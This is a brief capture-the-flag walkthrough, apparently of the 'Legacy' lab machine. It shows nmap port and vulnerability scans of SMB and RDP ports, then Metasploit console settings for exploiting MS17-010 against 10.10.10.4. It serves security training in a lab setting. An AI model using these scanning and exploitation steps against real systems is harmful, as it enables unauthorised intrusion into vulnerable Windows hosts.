Legacy
Port Scanning and General Enumeration (Nmap)
- Reading/Resources
My initial all ports scan showed 139
, 445
and 3389
open. So I targeted those in my targets scan.
nmap -p 139,445,3389 -oN targeted -Pn -T4 -A 10.10.10.4
Also ran a script scan using the --script=vuln
switch
nmap -Pn 10.10.10.4. -p 139,445 --script=vuln
Interesting…
Access (Metasploit, ms17-010)
- Reading/Resources
Let’s follow up on ms17-010 lead from nmap using metasploit.
msfconsole
search ms17-010
Set your options:
set rhosts 10.10.10.4
set lhost tun0
Fire!
That was easy. Capture the flags.